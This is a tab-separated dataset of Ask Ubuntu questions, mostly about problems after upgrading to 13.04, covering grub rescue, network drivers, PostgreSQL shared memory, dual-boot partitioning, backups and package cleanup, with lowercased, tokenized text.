286837	grub rescue fails with `` boot repair '' with error `` unknown file system ''	the problem was in filesystem , this is not dublicate to grub rescue standard topics . after laptop system crush ( which was caused by hard restart ) , my ubuntu linux is not booting , it is showing now : error : uknown filesystem grub rescue > solutions that i tried : 1st solution : i 've read a lot about similar problems and i 've tried to work with grub rescue from console : grub rescue > ls ( hd0 ) ( hd0 , msdos5 ) ( hd0 ) ( hd0 , msdos1 ) grub rescue > ls ( hd0 , msdos5 ) error : uknown filesystem grub rescue > ls ( hd0 , msdos1 ) error : uknown filesystem so , i ca n't list/find my linux filesystem , , , 2nd solution ) after all , i decide to try boot repair , i 've installed it on ubuntu live usb , but there is no `` recommended repair '' button and there is no `` advanced options '' . there is only one button which is `` create a bootinfo summary '' - i 've created one , the link is http : //paste.ubuntu.com/5609223/ . i tried bootrepair on latest ubuntu and on linux secure remix , they both are live editions baked on usb - the same result , boot repair not working . also os-uninstaller on linux secure remix states that there is not found/installed os . this is the log from boot repair : http : //paste.ubuntu.com/5609223/ i tried the same linux secure remix on a different pc and at least there is button `` recommended repair '' . so i think the problem is in my hdd or mbr .. i do n't know.. i am out of options ... please , help ! update 1 : thank you guys for the reply : i tried the solutions , they are pretty much the same but i can not mount /dev/sda1 . i do some research , but it seems that it is some kind of damage . here what i done : fdisk root @ ubuntu : /home/ubuntu # sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xebd671ce device boot start end blocks id system /dev/sda1 * 2048 302815231 151406592 83 linux /dev/sda2 302817278 312580095 4881409 5 extended /dev/sda5 302817280 312580095 4881408 82 linux swap / solaris disk /dev/sdb : 8021 mb , 8021606400 bytes 110 heads , 46 sectors/track , 3096 cylinders , total 15667200 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x04030201 device boot start end blocks id system /dev/sdb1 * 10392 15667199 7828404 b w95 fat32 mount root @ ubuntu : /home/ubuntu # sudo mount /dev/sda1 /mnt mount : you must specify the filesystem type blkid root @ ubuntu : /home/ubuntu # blkid /dev/loop0 : type= '' squashfs '' /dev/sda5 : uuid= '' ce99d1c7-16fd-4b60-b0af-af6a14b8bdbe '' type= '' swap '' /dev/sdb1 : label= '' danail '' uuid= '' 4ed6-708d '' type= '' vfat '' so i tried different types : ext3 , ext4 , vfat and auto , but the result is same for all of types : root @ ubuntu : /home/ubuntu # sudo mount -t ext4 /dev/sda1 /mnt mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so root @ ubuntu : /home/ubuntu # sudo mount -t auto /dev/sda1 /mnt mount : you must specify the filesystem type root @ ubuntu : /home/ubuntu # sudo mount -t ext2 /dev/sda1 /mnt mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so root @ ubuntu : /home/ubuntu # sudo mount -t vfat /dev/sda1 /mnt mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so root @ ubuntu : /home/ubuntu # dmesg root @ ubuntu : /home/ubuntu # dmesg | tail [ 2424.052221 ] squashfs error : ca n't find a squashfs superblock on sda1 [ 2620.531816 ] ext4-fs ( sda1 ) : vfs : ca n't find ext4 filesystem [ 2626.204025 ] ext3-fs ( sda1 ) : error : ca n't find ext3 filesystem on dev sda1 . [ 2626.208650 ] ext4-fs ( sda1 ) : vfs : ca n't find ext4 filesystem [ 2626.208938 ] fat-fs ( sda1 ) : bogus number of reserved sectors [ 2626.208943 ] fat-fs ( sda1 ) : ca n't find a valid fat filesystem [ 2626.209377 ] squashfs error : ca n't find a squashfs superblock on sda1 [ 2635.692959 ] ext2-fs ( sda1 ) : error : ca n't find an ext2 filesystem on dev sda1 . [ 2644.614887 ] fat-fs ( sda1 ) : bogus number of reserved sectors [ 2644.614894 ] fat-fs ( sda1 ) : ca n't find a valid fat filesystem mount root @ ubuntu : /home/ubuntu # mount /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sdb1 on /cdrom type vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/ubuntu/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=ubuntu ) thank for your help.. ca n't solve this for now.. update 2 : the solution is to run fsck on the broken /dev/sda1 system . the problem is in the filesystem , not in grub . that 's why grub ca n't see the filesystem with ls . thank you !
286841	authentication required for every 1 hour for internet but no proxy . how do i get out from this problem ?	os : ubuntu 12.04 and/or above my system connected to university campus internet which has no proxy . but needs authentication ( username and password ) for every 1 hour . if the web-browser is running with authentication , then no problem for updating/installing packages . but if the web-browser is off or timed out for authentication , then update/installation ca n't be done . how do i set it right ? here is a screenshot of the authentication :
286843	how to make ubuntu one work w/ windows 7 and custom profiledir ?	i have the following problem : system resides on drive c : user data resides on drive a : - it 's a partition of a fixed , built-in hdd . users directory is on drive a : and it is rewritten in the registry ( hkey_software/..microsoft/windows nt/profilelist ) properly . everything handles it nicely . ubuntu one is able to sync its own folder . except , when i try to sync anything outside the ubuntu one folder , it says the chosen directory `` a : \users\username\my documents '' os not valid . please choose a folder inside your `` a : \users\username '' directory , and not overlapping with any existing cloud folder . i 'm interested even in config files , editing binary files , registry , whatever , i just want this to be fixed in a few days - or rather , i want a free autobackup solution , hopefully with realtime file change watch and without duplicating all the files with synctoy & its friends . it 's not my laptop , but if a file gets lost , i 'm to be blamed by my girlfriend ... ..
286844	upgrade release - with fallback options , or do it virtually	so then the 13.04 release came along . unfortunately i have only had trouble with earlier upgrades and always ended up in a fubar and consequently reinstalling entire system . would like to avoid that this time . i have a box with ubuntu 12.10 32bit running gnome 3 classic + various services like bind9 , mysql , postfix , apache , ++ . after some back and forth i 've decided to create a clone of current system . if system breaks i can do a revert . question is how to best do this . i can do a clone of the partition with dd , but guess the upgrade would also mean some changes to grub and mbr . the current layout is approximately : name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda1 8:1 0 7.6g 0 part [ swap ] ├─sda2 8:2 0 93.5g 0 part /mnt/old_ubu_11.04 ├─sda3 8:3 0 93.5g 0 part / ├─sda4 8:4 0 1k 0 part └─sda5 8:5 0 737g 0 part /mnt/storage sdb 8:16 0 1.8t 0 disk └─sdb1 8:17 0 1.8t 0 part /mnt/develop sdc 8:32 0 1.8t 0 disk ... system and home reside at sda3 . first thought would be something like : dd if=/dev/sda3 of=/mnt/storage/ubuntu_12.10.img dd if=/dev/sda bs=512 count=1 of=/mnt/storage/mbr.img dd if=/dev/sda bs=512 skip=1 count=3 of=/mnt/storage/post_mbr.img problem with this approach , ( i guess ) , is pseudo file systems like /sys and /proc ( so i should probably do it from a live cd/usb ) . would it be an issue writing such images back ? would clonezilla or something similar be better ? ( never used it ) . also ; what i would really like to do is use a virtual system . guess it would be an 80 % or so likeness ( due to hw layers etc. ) . and then run do-release-upgrade in that by e.g . virtualbox . could this be a viable option ? notes on changes i add this as it was what my question in part started out as – and could probably be helpful to others . i also wonder if it gives an accurate picture of what is going to be updated . any confirmation on this would be great as well . no ! apt-get -- simulate dist-upgrade , does not simulate upgrade from one release to another . e.g . as explained here : apt-get dist-upgrade the same as the above ( apt-get upgrade sic . ) , except add the `` smart upgrade '' checkbox . it tells apt to use `` smart '' conflict resolution system , and it will attempt to upgrade the most important packages at the expense of less important ones if necessary . `` apt-get dist-upgrade '' does not perform distribution upgrade . ( see a lot of notes and `` answers '' around the web that states this as an option . ) after some fooling around i tied the following : cd /etc/apt/ sudo cp sources.list sources.list_bak sudo vi sources.list # in vim : : % s/quantal/raring/gc # yes , i can do sed -i 's/ ... ' but like to have bit more control . : wq # make log sudo apt-get update cd /tmp apt-get -- simulate dist-upgrade > quantal-2-raring.log 2 > & 1 # and better to be safe then sorry so at once : su -c 'cp sources.list sources.raring & & mv sources.list_bak sources.list & & apt-get update' giving me this list of changes . as a side note : the /etc/apt/sources.list states : # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . that document is outdated and should probably ( also ) link to this .
286846	13.04 mangled my language support	i 'm in the us , and just upgraded to 13.04 , now all of my menus are half english , half chinese , and going into language support and applying english system-wide does nothing .
286852	postgres - could not create shared memory segment : invalid argument	shmmax , shmall , i just ca n't win ; ) i 've tried changing around my /etc/sysctl.d/30-postgresql-shm.conf file a fair bit uncommenting and changing the kernel.shmmax and kernel.shmall a bit but it did n't seem to help . # /etc/sysctl.d/30-postgresql-shm.conf # shared memory settings for postgresql # note that if another program uses shared memory as well , you will have to # coordinate the size settings between the two . # maximum size of shared memory segment in bytes # kernel.shmmax = 33554432 # original # kernel.shmmax = 41943040 # tried this ( bigger ) kernel.shmmax = 943040 # and this ( smaller ) # maximum total size of shared memory in pages ( normally 4096 bytes ) # kernel.shmall = 2097152 # tried with and without this commented out then ( the error ) : $ sudo /etc/init.d/postgresql start * starting postgresql 9.2 database server * the postgresql server failed to start . please check the log output : 2013-04-27 16:21:33 edt fatal : could not create shared memory segment : invalid argument 2013-04-27 16:21:33 edt detail : failed system call was shmget ( key=5432001 , size=30490624 , 03600 ) . 2013-04-27 16:21:33 edt hint : this error usually means that postgresql 's request for a shared memory segment exceeded your kernel 's shmmax parameter . you can either reduce the request size or reconfigure the kernel with larger shmmax . to reduce the request size ( currently 30490624 bytes ) , reduce postgresql 's shared memory usage , perhaps by reducing shared_buffers or max_connections . if the request size is already small , it 's possible that it is less than your kernel 's shmmin parameter , in which case raising the request size or reconfiguring shmmin is called for . the postgresql documentation contains more information about shared memory configuration . note : how would i 'raise the request size ' as that is the only thing i have n't tried that was listed .
286853	no launcher or menu	i 've upgraded from 12.10 to 13.04 and now i 'm missing my launcher and menu bars . i can open terminal through keyboard shortcut . can anyone help
286855	virtualbox not allowing a usb device to be added	what am i trying to do ? i am attempting to add a usb device to show up in windows 7 in virtualbox . what is the problem and what have i done ? i 've had to jump through a number of hoops to get this to work . in order for my software ( gearbox installer ) to work properly , i had download virtualbox and used an iso image of windows 7 professional ( 32-bit ) . it took me until i could not add a usb port in the virtualbox ui to realize that the software and hardware did not install properly ( i did restart my computer after running the directions for installing this software ) . i followed all of these steps up until i reached the final step ... the checkboxes for `` enable usb controller '' and `` enable usb 2.0 ( ehci ) controller '' are greyed out , `` enable usb controller '' is check marked by default , and no device appears upon clicking the usb+ sign . long story short ... i do n't know if the software installed properly since i can not add a usb port in virtualbox . however , after plugging in the toneport interface , the green light came on indicating it was operating properly .
286856	how should i set up my partitions ?	i have a dual boot set up with xp ( i know it 's ancient but i have a favored game that wo n't work on anything newer ) and ubuntu 12.10 . both oss are on a 70gb hdd and i have a 300gb hdd as well . i have a dell dimension 3000 with a pentium 4 2.80ghz cpu and 1.2gb of ram . my current partition set up is as follows : on the 70gb hdd i have ~32.1gb ntfs for windows , 42.3gb ext2 for ubuntu , and 1mb for the swap . the 300gb is all ntfs , but has plenty of room to change and i can easily back up my ubuntu data there if i have to make changes . what would be a good way to set up my partitions ?
286860	wired and wireless do not work : config_iwlwifi_debug disabled	my wifi or wired internet will not work . and there are these 2 error codes . iwlwifi 0000:02:00.0 : config_iwlwifi_debug disabled / iwlwifi 0000:02:00.0 : config_iwlwifi_debugfs enabled i am running 12.04 lts . how do i fix this ? ? ?
286864	ubuntu 13.04 installation problem	i have tried the install numerous times but it always has a apt error when it finishes checking the cd-rom . sorry , i forgot what the full name is .
286868	ubuntu 12.04 wlan not running ( intel corporation centrino advanced-n 6235 ( rev 24 ) )	i just installed 12.04.2 , and got the latest updates . network with cable ethernet ist running fine , but wlan never did so . 03:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) ifconfig shows only `` eth0 '' and `` lo '' , there is no wlan mentioned . my notebook is a asus bv53 .
286872	where are the mouse settings in ubuntu 13.04 ?	after upgrade to 13.04 i can not find mouse settings . there are only settings for touchpad available in the 'mouse & touchpad ' settings . the settings for mouse are missing ( speed , acceleration ) for any wireless mouse i tried . they appear only for wired mice . how can i fix this ?
286874	dual boot windows 8 and ubuntu more official way	i know that there are more questions about dual booting windows and ubuntu . however mine is a little different . i did my research but i did not find any solution at my problem at this group . i have dual boot win and ubuntu using easybcd and it works just good . with this practice , if i log in at ubuntu , and i shut my pc down , then the next time grub will load , instead of the official windows bootloader . in addition if i select windows from grup , windows take a long time to boot . i 'd like to know whether is anybetter way to make it . e.g . something official from microsoft that recognises ubuntu ( or even shows for example the ubuntu logo at the boot screen . ) thank you guys
286880	13.04 ethernet adapter not connecting ( ar8161 )	i had the same problem under 12.10 where my atheros ar8161 would n't even show up under the network options . the device does show up in 13.04 as the name `` wired connection 1 '' when i try to connect to this device , though , it just times out . under 12.10 , i installed the compact-wireless alx driver and everything was fixed . but i am unable to install it in 13.04 . here are a few console outputs for you -- if you need more information , please ask -- thank you . lspci brett @ brett-pc : ~ $ lspci | grep ethernet 03:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 08 ) ifconfig brett @ brett-pc : ~ $ ifconfig eth0 link encap : ethernet hwaddr c8:60:00:9a:11:0e inet6 addr : fe80 : :ca60 : ff : fe9a:110e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:148 errors:0 dropped:0 overruns:0 frame:0 tx packets:177 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:13354 ( 13.3 kb ) tx bytes:38207 ( 38.2 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:7073 errors:0 dropped:0 overruns:0 frame:0 tx packets:7073 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:582967 ( 582.9 kb ) tx bytes:582967 ( 582.9 kb ) edit : here 's the link to my last thread when i was having troubles with 12.10 . maybe this 'll spark some interest in this thread . ''
286887	blank screen after update to 13.04	i have a dell xps 12 with intel graphics . after update to 13.04 my screen stays dark after boot . when i attach an external monitor it works . but it takes several tries to swicht on the internal display of the notebook . can anybody help ?
286894	how to remove ubuntu	so i originally installed ubuntu to a flash drive with wubi . later i removed it from the flash drive and reinstalled a new version ( still with wubi ) but this time to my hard drive . both still show up when i turn on my computer is there a way i can get rid of the first one ( since it does n't work anymore ) ?
286897	why is check_linux_raid missing from nagios plugins in 13.04 ?	after upgrading to 13.04 my nagios monitoring started to notify me of a problem with my raid setup ( mdadm raid ) . after some investigation it seems the check_linux_raid plugin is not included anymore in any of the nagios plugins packages . at least as far as i could see . is this intentional ? if yes , which plugin am i supposed to use for checking a linux software raid ?
286906	precise daily cd vs point release	i wanted to download precise live and alternate cd iso , but i 'm confused on what to choose among daily build vs point release 12.04.2 . all i know is daily cd will have updated versions of packages . but will daily build introduce new features ? and thereby possible new bugs ? is daily build as stable as the point release ? please suggest .
286908	how to back up to a freenas box ?	i have a freenas box running 8.3 , with a password protected smb share . how would i set up deja dup to work with that share ? i can switch to an afp or nfs share , if need be .
286909	ca n't boot into ubuntu 13.04 ? grub4dos instead of grub2 menu ?	i am trying to dual boot windows 7 and ubuntu 13.04 along side each other . i installed 13.04 to a separate partition on the same hard drive as my win7 install without any difficulties but after i rebooted it booted immediately into windows . grub never showed up . i downloaded a tool called easybcd and added grub to the boot as per the instructions i found here : `` dual-boot windows 8 and ubuntu 12.10 on uefi hardware '' when i try and boot into grub i get to this screen instead of the standard grub menu : what do i do at this point ? thanks in advance .
286911	new hard drive , new file system	i am putting a new hard drive in an old computer and i want to know the best file system to use for installing ubuntu 13 . i am going to install from a usb drive and i have `` iso to usb '' software ; the choices are fat , fat32 , exfat , and ntfs .
286913	skype not working after upgrading to 13.04 from 12.10	i upgraded to 13.04 from 12.10. now skype wont launch . i have reinstalled it but still will not work.i have tried ideas in this post , but still not working . i have problems to install skype after a distro upgrade any ideas would be a help thanks .
286915	ca n't connect to specific wifi network	i 'm using ubuntu 12.10 and i ca n't connect to a specific password-protected wifi network . i have the password and i can connect to it with success in the same laptop with windows 8 . i can connect to other wifi networks using ubuntu , so it seems that this specific network is different somehow in a way that ubuntu fails to connect to it . when i try to connect it stays in `` connecting '' state for a long time ( 2-5 minutes ) until it fails with `` connection failed : activation of network connection failed '' error . how can i fix this ?
286916	does anyone know a dimscreen ( brightness ) for ubuntu ?	does anyone know if there is an app like dimscreen for ubuntu ? dimscreen reduce the brightness of monitor using a gray filter . there are similar app also on android .
286919	problem using wifi	i have installed ubuntu 12.04 and my machine is dell inspiron 1420 . can anybody suggest me that how to enable my wifi because in my network connections there is no list of wifi networks and even my the system is not showing that wifi is turned on ! !
286927	qq - small , unidentifiable icons on desktop	running qq with nautilus . display is 1280 x 1024 - viewsonic , recognized by qq . when i put a file or folder on the desktop , the icon is incredibly small nearly invisible . have to go into the change icon size menu to change . and even when i expand the icon , i have no clue of what the file is or what it does - must go into the properties menu , open the folder or run the file and hope for the best . this is very time consuming and a huge pain when you are developing with deadlines . makes me want to go back to windows . icons should be larger by default and labeled - this is a big pain and waste of time : a desktop littered by tiny , unidentifiable icons : virtually useless ! how can this be fixed ? is there an option/setting i can change to fix this ?
286928	stuck in grub rescue after 13.04 installer crashed	so i created a live usb for 13.04 using lili usb creator on windows . during the installation process , the installer crashed with some 'apt failure to get data from cd rom ' . now i 'm stuck with grub rescue and ca n't boot into windows 7 either since i ca n't get a fully functional grub . what do i do to rectify this problem ? thanks in advance .
286931	how to install latest version of rgedit in 13.04	i 've got a bug in the version of rgedit in ubuntu 's repository and i want to install the latest version to see if this plays better with 13.04 somehow . what do i do once i download the archive ? where do i put it ? do i need to uninstall the old version of rgedit that was installed via the `` software center '' ? for posterity : if anyone else has the same problem , note that updating to the latest version of rgedit does not solve the problem with plotting .
286937	64bit ubuntu 13.04 â problems with apps that use 32bit libs	upgrading from 12.10 , or fresh installation of ubuntu 13.04 . both have problems with the 32libs . skype does not launch , and playonlinux keeps asking for opengl32 libs even after installing ia32-libs . also tried after nvidia drivers install .
286944	unity does n't show some running apps	in ubuntu 13.04 , after a fresh install . unity does not show some running apps in the unity bar or when alternating app with alt+tab . when upgraded from 12.10 this did not happen . example apps : terminal , repository-software-manager
286947	obsolete packages vs. orphaned packages	what is the difference between obsolete and orphaned packages ? more specifically , why does deborphan produce this : dave @ ubuntu : ~ $ deborphan libbind9-80 libllvm3.1 libgrail5 libpython3.2 libsvga1 libarchive12 libdirectfb-1.2-9 gcalctool liblwres80 libqpdf8 libkms1 libnux-3.0-0 ... while aptitude search '~o ' produces this : dave @ ubuntu : ~ $ aptitude search '~o' ida libarchive12 - multi-format archive and compression library ( shared li i libbind9-80 - bind9 shared library used by bind i libdns81 - dns shared library used by bind i libdrm-nouveau1a - userspace interface to nouveau-specific kernel drm serv ida libgrail5 - gesture recognition and instantiation library i libisc83 - isc shared library used by bind i libisccc80 - command channel library used by bind i libisccfg82 - config file handling library used by bind i liblwres80 - lightweight resolver library used by bind ida libnux-3.0-0 - visual rendering toolkit for real-time applications - s ida libnux-3.0-common - visual rendering toolkit for real-time applications - c ida libpython3.2 - shared python runtime library ( version 3.2 ) ida libqpdf8 - runtime library for pdf transformation/inspection softw i libudev0 - udev library i a linux-headers-3.5.0-27 - header files related to linux kernel version 3.5.0 i a linux-headers-3.5.0-27-generic - linux kernel headers for version 3.5.0 on 32 bit x86 sm i linux-image-3.5.0-27-generic - linux kernel image for version 3.5.0 on 32 bit x86 smp i linux-image-extra-3.5.0-27-generic - linux kernel image for version 3.5.0 on 32 bit x86 smp i python3.2 - interactive high-level object-oriented language ( versio i python3.2-minimal - minimal subset of the python language ( version 3.2 ) bonus question : apt-get autoremove is even more different . why ? dave @ ubuntu : ~ $ sudo apt-get -- purge autoremove [ sudo ] password for dave : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : gksu* libarchive12* libdirectfb-1.2-9* libgksu2-0* libgnome-menu2* libgrail5* libllvm3.1* libnux-3.0-0* libnux-3.0-common* libpython3.2* libqpdf8* libsvga1* libts-0.0-0* libx86-1* mobile-broadband-provider-info* python-imaging* python-imaging-compat* python- oauth* tsconf* 0 upgraded , 0 newly installed , 19 to remove and 0 not upgraded . after this operation , 33.8 mb disk space will be freed . do you want to continue [ y/n ] ? n abort . in case anyone wants to know , the upgrade to 13.04 is what prompted this .
286954	problems upgrading dual-boot win7/12.10 to 13.04	i have a home setup running dual boot win7 and ubuntu 12.10 . the way i have it set up is using the windows boot manager to allow choosing os at boot ( win7 is the first option so the kids can get to it by default ) , if i choose the ubutu option i get to grub and boot into ubuntu . not sure if it makes any difference but the system has dual hdds running in raid-1 . so , thursday evening i allowed the software updater to update me to 13.04 . the app warned it would take 35 minutes to download and possibly a few hours to install . i watched for a while and the download of 1400 odd packages was progressing well , up to about 800-900 . i walked away and came back probably 15 minutes later , my xscreensaver had kicked in but was frozen so i do n't know where things got to on the download/upgrade . the mouse pointer would move on the screen , but nothing else responded . i decided to leave the computer to see if maybe it was actually working in the background - i left it for about 4 hours and nothing at all changed so i finally powered down . when i powered up i can still get into win7 ( good news ) and hitting the ubuntu option in the os selector takes me to grub2.00-7ubuntu11 , but selecting ubuntu on this grub menu gives first a black screen with a blinking cursor then a message : general error mounting filesystems . a maintenance shell will now be started . control-d will terminate this shell and reboot the system . root @ kibi-blah-blah : ~ # from there i am a bit clueless . i can do cd ../home/kibi and i see all my stuff is still there so i really do n't want to reformat the partition and wipe everything . what is the next step to try to recover so i have working 13.04 ( or failing that working 12.10 ) ? over here was a suggestion to try e2fsck -c0 -p -f -v /dev/sda1 but i get a message that this is in use . i tried to continue anyway and type in apt-get -f dist-upgrade but got the following message ( s ) : w : not using locking for read only lock file /var/lib/dpkg/lock e : dpkg was interrupted , you must manually run 'dpkg -- configure -a ' to correct the problem being a sucker for instructions i tried dpkg -- configure -a and got this error : dpkg : error : unable to access dpkg status area : read-only file system what 's my next step ? update so , i booted from an install usb and did `` try ubuntu '' , and am running gparted . i selected the linux partition ( ext4 with 22 out of 120 gig in use ) and clicked on `` check '' . it 's been `` checking '' for 4 hours now - how long is this supposed to take ? or does `` 1 operation pending '' mean it did n't even start checking yet ? another update oh ffs ! it sits there pending till you press the check mark ? grrrr ...
286955	how to cycle power to a pci device with setpci	if i have my vendor and device id of a pcie card , how can i cycle power to that card using setpci ? eg : setpci -d 118d:3000 _________ i 'm comfortable with ubuntu , but i 'm no expert by far so please correct me if i have the absolute wrong idea .
286962	deja dup ( backup ) not ignoring folders	the built in backup application on a fresh installation of ubuntu 13.04 works great . i have it set to encrypt my files and upload them via ssh to an offsite file server . however , not wanting to waste space and bandwidth , i chose to ignore several folders in my home directory by adding them to the 'folders to ignore ' list in the backup options . the backup seems to ignore this list and upload the contents of those folders anyway , as evidenced by the detail output of the backup window when the backup is running . i 've tried to restart my computer several times . remove and add again the folders to the ignore list . i 've done hit both 'resume later ' and 'cancel ' on the backup and starting it manually . bounty will be awarded to whoever can tell me the reason why my folders are not properly being ignored and provide a fix leading to the resolution . here is my folders tab for the backup options . here is the output of the backup dialog .
286971	hdd makes high-pitched noise in windows , but it is silent in ubuntu !	i was just wondering what 's different about ubuntu that makes my hdd work more silently than in windows . in windows my hard disk makes a very audible high-pitch noise ( no vibrations ) , but in ubuntu it just works perfectly , absolutely no noise . it 's all the same whether i 'm running windows 7 or windows 8 , or ubuntu 12.04 to 13.04 !
286974	unable to shutdown , restart or log out	i have been unable to restart , shutdown , or log out of ubuntu since the release of 12.04 . i have upgrade at the time of release for 12.10 and now for 13.04 and have had no change in the situation . on logout or restart i get a solid black screen where it just sits . i have let it sit for long periods and i get a message every 2 minutes or so stating something about xorg blocked for 120seconds . i have search extensively and ca n't find anything that actually fixes it . using the shutdown now command works from terminal with -p -r. updating grub had no effect . any clues or help would be great .
286979	ubuntu 13.04 hangs at purple screen	i installed ubuntu 13.04 removing my old windows xp . and now i see that it does n't go beyond purple screen . any help is highly appreciated !
286985	how to install ubuntu 13.04 if i do n't know how to rezise my partitions ?	i am trying to install ubuntu 13.04 ( or whatever the latest version is but i 'm pretty sure that 's it ) . when i get to the sliders for partition size it goes to the advanced partition-viewer and there 's a lot of different things starting with /dev/ when i try to just continue without touching anything it says '' some of the partitions you created are to small . please make the following partitions at least this large : /2.9 gb if you do not go back to the partitioner and increase the size of these partitions the installation may fail . '' how do i fix this ? is there an auto-partitioner where the installer takes care of it automatically ? do i/ how do i fix it myself ?
286993	how to remove ubuntu installed alongside another version of ubuntu ?	i successfully installed desktop 13.04 beside 12.04 . now that i have confirmed that 13.04 works and have retrieved old data files , how do i remove 12.04 to regain file space ?
286995	dual monitor connected to hdmi port not detecting on dell vostro 3750	i am using dell vostro 3750 laptop with 2 monitors . os kubuntu 13.04 1 monitor i connected with vga and it is working fine . but another monitor connected to hdmi port is not detected . i connected hdmi monitor to my friends laptop having windows 7 and it works fine . but only with ubuntu it is not working . lspci -v output 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 04c6 flags : bus master , fast devsel , latency 0 , irq 16 memory at f0000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 4000 [ size=128 ] expansion rom at f1000000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel capabilities : [ 128 ] power budgeting < ? > capabilities : [ 600 ] vendor specific information : id=0001 rev=1 len=024 < ? > kernel driver in use : nvidia kernel modules : nvidia_current_updates , nvidia , nouveau , nvidiafb 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 04c6 flags : bus master , fast devsel , latency 0 , irq 51 memory at f1400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 kernel modules : i915 xrandr output xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 lvds1 connected ( normal left inverted right x axis y axis ) 640x480 59.9 vga1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 531mm x 298mm 1920x1080 60.0*+ 1680x1050 60.0 1600x900 60.0 1280x1024 75.0 60.0 1280x800 59.8 1152x864 75.0 1280x720 60.0 1024x768 75.1 60.0 832x624 74.6 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 any help would be appreciated .
286996	aptoncd load button does not work even after installing hal	i 'm using aptoncd on my ubuntu 13.04 amd64 installation . i 've installed hal , but the load button in the restore menu of aptoncd does not work at all . when i run aptoncd through the terminal , this is the output i get after clicking the load button : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptoncd/restore/restorewindow.py '' , line 205 , in on_btnloadfrom bus = dbus_helper.devicelist ( ) file `` /usr/lib/python2.7/dist-packages/aptoncd/core/dbus_helper.py '' , line 26 , in __init__ self.hal_object = self.bus.get_object ( 'org.freedesktop.hal ' , '/org/freedesktop/hal/manager ' ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 i ca n't make any sense about why this would be happening , and i would really appreciate some help
